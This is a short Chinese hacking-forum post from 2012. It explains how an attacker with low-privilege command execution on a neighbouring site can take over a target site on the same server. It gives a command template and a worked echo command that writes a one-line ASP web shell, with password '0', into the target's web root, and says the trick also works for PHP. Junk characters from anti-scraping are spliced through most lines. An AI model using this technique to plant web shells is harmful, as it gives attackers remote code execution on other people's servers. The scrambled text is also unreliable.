在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
6 I0 ]( U4 s& o* f: z% Y
8 ~2 A) i" H8 {5 n$ r* P7 ]& u1 Z命令格式
: _' {3 O. }6 b6 a
- ?5 X5 @$ _6 n! s8 [! }Echo 语句 >目标站绝对目录7 V f5 F% N! W3 K+ @
3 W5 m! @3 i9 ] l; ^% Q例如:
7 p* L% j6 j: y$ x$ u4 [2 I- i0 }- Q. V6 B
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp& Z. O: y0 Z$ o$ a' Z9 {; g
/ H. |# u6 L/ S) ` x
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。2 k* B% A! `- J9 z
|
发表于 2012-9-23 14:40:24
收藏
支持
反对